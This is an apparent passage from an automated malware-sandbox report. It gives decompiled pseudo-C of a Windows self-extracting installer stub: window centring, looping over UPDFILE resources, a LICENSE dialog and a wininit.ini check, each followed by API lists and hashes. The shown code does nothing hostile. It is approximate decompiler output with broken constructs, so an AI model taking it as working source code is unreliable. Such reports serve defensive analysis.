                                                                                                                                                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                      				_t69 = GetDC(_v44);
                                                                                                                                                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                      				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                      				_t56 = _v48;
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                      				if(_t72 >= 0) {
                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                      			}
























                                                                                                                                                                                                      0x003e43d0
                                                                                                                                                                                                      0x003e43d8
                                                                                                                                                                                                      0x003e43df
                                                                                                                                                                                                      0x003e43e6
                                                                                                                                                                                                      0x003e43ec
                                                                                                                                                                                                      0x003e43f1
                                                                                                                                                                                                      0x003e4400
                                                                                                                                                                                                      0x003e4403
                                                                                                                                                                                                      0x003e440b
                                                                                                                                                                                                      0x003e4420
                                                                                                                                                                                                      0x003e4429
                                                                                                                                                                                                      0x003e4437
                                                                                                                                                                                                      0x003e4444
                                                                                                                                                                                                      0x003e4447
                                                                                                                                                                                                      0x003e444d
                                                                                                                                                                                                      0x003e4454
                                                                                                                                                                                                      0x003e445b
                                                                                                                                                                                                      0x003e4460
                                                                                                                                                                                                      0x003e4461
                                                                                                                                                                                                      0x003e4467
                                                                                                                                                                                                      0x003e446f
                                                                                                                                                                                                      0x003e4473
                                                                                                                                                                                                      0x003e4473
                                                                                                                                                                                                      0x003e4463
                                                                                                                                                                                                      0x003e4463
                                                                                                                                                                                                      0x003e4463
                                                                                                                                                                                                      0x003e447a
                                                                                                                                                                                                      0x003e4481
                                                                                                                                                                                                      0x003e4484
                                                                                                                                                                                                      0x003e448a
                                                                                                                                                                                                      0x003e4492
                                                                                                                                                                                                      0x003e4496
                                                                                                                                                                                                      0x003e4496
                                                                                                                                                                                                      0x003e4486
                                                                                                                                                                                                      0x003e4486
                                                                                                                                                                                                      0x003e4486
                                                                                                                                                                                                      0x003e44b8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003E43F1
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 003E440B
                                                                                                                                                                                                      • GetDC.USER32(?), ref: 003E4423
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 003E442E
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 003E443A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 003E4447
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003E44A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                      • Opcode ID: a1a4475224fbe5bb6065c56c76700dcc19176032b71ced2839f0b052355bf18e
                                                                                                                                                                                                      • Instruction ID: 20c56016b3e6fa49a1425c0a572bfb52614d09ef14f317cb4db901b32f0ea557
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1a4475224fbe5bb6065c56c76700dcc19176032b71ced2839f0b052355bf18e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6315071F00559AFCB15CFB9DD899EEBBB9EB89310F154269F805F7280DA30AD058B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                      			E003E6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t16 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                      				E003E171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                                      						 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                      						 *0x3ea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                      							E003E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					return E003E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x003e6298
                                                                                                                                                                                                      0x003e62a0
                                                                                                                                                                                                      0x003e62a7
                                                                                                                                                                                                      0x003e62ad
                                                                                                                                                                                                      0x003e62af
                                                                                                                                                                                                      0x003e62bb
                                                                                                                                                                                                      0x003e62c3
                                                                                                                                                                                                      0x003e62c4
                                                                                                                                                                                                      0x003e633b
                                                                                                                                                                                                      0x003e633b
                                                                                                                                                                                                      0x003e6345
                                                                                                                                                                                                      0x003e634d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e62da
                                                                                                                                                                                                      0x003e62de
                                                                                                                                                                                                      0x003e635f
                                                                                                                                                                                                      0x003e6369
                                                                                                                                                                                                      0x003e62e0
                                                                                                                                                                                                      0x003e62e0
                                                                                                                                                                                                      0x003e62e0
                                                                                                                                                                                                      0x003e62e3
                                                                                                                                                                                                      0x003e62e5
                                                                                                                                                                                                      0x003e62e5
                                                                                                                                                                                                      0x003e62e8
                                                                                                                                                                                                      0x003e62e8
                                                                                                                                                                                                      0x003e62ea
                                                                                                                                                                                                      0x003e62eb
                                                                                                                                                                                                      0x003e62ef
                                                                                                                                                                                                      0x003e62f1
                                                                                                                                                                                                      0x003e62f3
                                                                                                                                                                                                      0x003e6302
                                                                                                                                                                                                      0x003e6308
                                                                                                                                                                                                      0x003e630d
                                                                                                                                                                                                      0x003e6314
                                                                                                                                                                                                      0x003e6314
                                                                                                                                                                                                      0x003e6316
                                                                                                                                                                                                      0x003e6319
                                                                                                                                                                                                      0x003e6355
                                                                                                                                                                                                      0x003e6357
                                                                                                                                                                                                      0x003e631b
                                                                                                                                                                                                      0x003e631b
                                                                                                                                                                                                      0x003e6331
                                                                                                                                                                                                      0x003e6334
                                                                                                                                                                                                      0x003e6339
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6339
                                                                                                                                                                                                      0x003e6319
                                                                                                                                                                                                      0x003e636b
                                                                                                                                                                                                      0x003e637d
                                                                                                                                                                                                      0x003e637d
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E62CD
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E62D4
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E631B
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 003E6345
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E6357
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                                                                                                      • Opcode ID: 78cdd72d295b180677fff801ecf26473311e442353ea2c10f8eadf38f20040d0
                                                                                                                                                                                                      • Instruction ID: df52757633c280b0df0c3b9b208c4049b07d8c71e1fb2e04ba42c04aad1cc8ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78cdd72d295b180677fff801ecf26473311e442353ea2c10f8eadf38f20040d0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D21F879A00269ABDB229F658C869FE7B7CEB44750F110319F902A72D1DB359D018BE1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E3A3F(void* __eflags) {
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                      				_t1 = E003E468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				 *0x3e8d4c = _t3;
                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                      					if(E003E468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA( *0x3e8d4c, "<None>") == 0) {
                                                                                                                                                                                                      							LocalFree( *0x3e8d4c);
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0x3e9124 = 0;
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t9 = E003E6517(_t19, 0x7d1, 0, E003E3100, 0, 0);
                                                                                                                                                                                                      						LocalFree( *0x3e8d4c);
                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0x3e9124 = 0x800704c7;
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree( *0x3e8d4c);
                                                                                                                                                                                                      					 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x003e3a46
                                                                                                                                                                                                      0x003e3a57
                                                                                                                                                                                                      0x003e3a5d
                                                                                                                                                                                                      0x003e3a63
                                                                                                                                                                                                      0x003e3a6a
                                                                                                                                                                                                      0x003e3a91
                                                                                                                                                                                                      0x003e3a9a
                                                                                                                                                                                                      0x003e3ad8
                                                                                                                                                                                                      0x003e3b13
                                                                                                                                                                                                      0x003e3b19
                                                                                                                                                                                                      0x003e3b1b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3b21
                                                                                                                                                                                                      0x003e3ae7
                                                                                                                                                                                                      0x003e3af4
                                                                                                                                                                                                      0x003e3afc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3afe
                                                                                                                                                                                                      0x003e3a87
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3a87
                                                                                                                                                                                                      0x003e3aa8
                                                                                                                                                                                                      0x003e3ab3
                                                                                                                                                                                                      0x003e3ab9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3ab9
                                                                                                                                                                                                      0x003e3a78
                                                                                                                                                                                                      0x003e3a82
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F64,?,00000002,00000000), ref: 003E3A5D
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 003E3AB3
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 003E3AD0
                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 003E3B13
                                                                                                                                                                                                        • Part of subcall function 003E6517: FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                        • Part of subcall function 003E6517: LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                        • Part of subcall function 003E6517: DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                        • Part of subcall function 003E6517: FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,003E3100,00000000,00000000), ref: 003E3AF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                      • Opcode ID: 749b809d00a49851e50aa75b46a05ac7916cbc56aa2035b5c15ef1c64af8f436
                                                                                                                                                                                                      • Instruction ID: e316f2f44a77d860f4f272488d47078156643b0752f2ac52c25f207fd30dccc1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 749b809d00a49851e50aa75b46a05ac7916cbc56aa2035b5c15ef1c64af8f436
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 901190306002E1ABD733AB23AC4DF577AADDBD9750F10472EB546DE2E1DA7988009A60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E24E0(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                      				_t7 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					E003E658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x003e24e0
                                                                                                                                                                                                      0x003e24eb
                                                                                                                                                                                                      0x003e24f2
                                                                                                                                                                                                      0x003e24f7
                                                                                                                                                                                                      0x003e2504
                                                                                                                                                                                                      0x003e250e
                                                                                                                                                                                                      0x003e251d
                                                                                                                                                                                                      0x003e252c
                                                                                                                                                                                                      0x003e2541
                                                                                                                                                                                                      0x003e2546
                                                                                                                                                                                                      0x003e2553
                                                                                                                                                                                                      0x003e2555
                                                                                                                                                                                                      0x003e2555
                                                                                                                                                                                                      0x003e2546
                                                                                                                                                                                                      0x003e256c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 003E2506
                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 003E252C
                                                                                                                                                                                                      • _lopen.KERNEL32 ref: 003E253B
                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 003E254C
                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 003E2555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                      • Opcode ID: 15f701aa2068b3f558a1838ba810fba21de06c4a8811cf5848c8fda674ed63f1
                                                                                                                                                                                                      • Instruction ID: 0dfc77cc2df6ec26bb166dec365458010e4ef1bca134b38bf9a8c35283ae67b1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f701aa2068b3f558a1838ba810fba21de06c4a8811cf5848c8fda674ed63f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501F5326001686BC7319B669C4DEDFBB7CDB82760F010364FA49D71D0DE749E41CA91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E003E36EE(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                      						 *0x3e8184 = 1;
                                                                                                                                                                                                      						 *0x3e8180 = 1;
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						 *0x3e9a40 = _t119;
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						__eflags =  *0x3e8a34 - _t138; // 0x0
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                      						__eflags =  *_t11;
